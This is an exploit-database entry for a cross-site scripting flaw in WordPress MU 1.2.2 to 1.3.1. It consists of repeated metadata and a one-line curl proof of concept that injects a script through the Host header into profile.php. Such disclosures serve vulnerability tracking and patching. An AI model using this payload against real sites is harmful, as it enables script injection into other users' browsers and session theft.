WordPress MU 1.2.2 < 1.3.1 - '/wp-includes/wpmu-functions.php' Cross-Site Scripting
| EKU-ID: 17750 | CVE: | OSVDB-ID: |
| Author: Juan Galiana Lara | Published: 2009-11-10 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 17750 | CVE: | OSVDB-ID: |
| Author: Juan Galiana Lara | Published: 2009-11-10 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
An attacker can exploit this issue by enticing an unsuspecting user to follow a malicious URI. The following proof of concept is available: curl -H "Cookie: my cookies here" -H "Host: <body onload=alert(String.fromCharCode(88,83,83))>" http://www.example.com/wp-admin/profile.php> tmp.html $ firefox tmp.html